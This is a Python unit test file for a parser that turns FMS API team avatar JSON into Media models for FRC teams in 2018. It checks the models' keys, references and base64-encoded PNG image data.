5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | null | null | null |
import json
import unittest2
from datafeeds.parsers.fms_api.fms_api_team_avatar_parser import FMSAPITeamAvatarParser
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from models.district import District
from consts.media_type import MediaType
class TestFMSAPITeamAvatarParser(unittest2.TestCase):
def setUp(self):
    # Build and activate a fresh GAE testbed per test so datastore and
    # memcache calls hit in-memory stubs instead of real services.
    # Activation must happen before the stubs are initialized.
    self.testbed = testbed.Testbed()
    self.testbed.activate()
    self.testbed.init_datastore_v3_stub()
    self.testbed.init_memcache_stub()
    ndb.get_context().clear_cache()  # Prevent data from leaking between tests
def tearDown(self):
    # Deactivate the testbed so the stubs installed in setUp are removed.
    self.testbed.deactivate()
def test_parse_team_with_avatar(self):
with open('test_data/fms_api/2018_avatars_frc1741.json', 'r') as f:
models, _, more_pages = FMSAPITeamAvatarParser(2018).parse(json.loads(f.read()))
self.assertFalse(more_pages)
self.assertEqual(len(models), 1)
# Ensure we get the proper Media model back
media = models[0]
self.assertEqual(media.key, ndb.Key('Media', 'avatar_avatar_2018_frc1741'))
self.assertEqual(media.foreign_key, 'avatar_2018_frc1741')
self.assertEqual(media.media_type_enum, MediaType.AVATAR)
self.assertEqual(media.references, [ndb.Key('Team', 'frc1741')])
self.assertEqual(media.year, 2018)
self.assertEqual(media.details_json, '{"base64Image": "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"}')
def test_parse_team_with_no_avatar(self):
    """Parsing a team payload that carries no avatar yields zero models."""
    with open('test_data/fms_api/2018_avatars_frc1.json', 'r') as fixture:
        parsed_models, _, has_more_pages = FMSAPITeamAvatarParser(2018).parse(json.load(fixture))
    self.assertFalse(has_more_pages)
    self.assertEqual(len(parsed_models), 0)
def test_parse_result_with_multiple_teams(self):
with open('test_data/fms_api/2018_avatars_multiple.json', 'r') as f:
models, _, more_pages = FMSAPITeamAvatarParser(2018).parse(json.loads(f.read()))
self.assertFalse(more_pages)
self.assertEqual(len(models), 1)
# Ensure we get the proper Media model back
media_team_1741 = models[0]
self.assertEqual(media_team_1741.key, ndb.Key('Media', 'avatar_avatar_2018_frc1741'))
self.assertEqual(media_team_1741.foreign_key, 'avatar_2018_frc1741')
self.assertEqual(media_team_1741.media_type_enum, MediaType.AVATAR)
self.assertEqual(media_team_1741.references, [ndb.Key('Team', 'frc1741')])
self.assertEqual(media_team_1741.year, 2018)
self.assertEqual(media_team_1741.details_json, '{"base64Image": "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
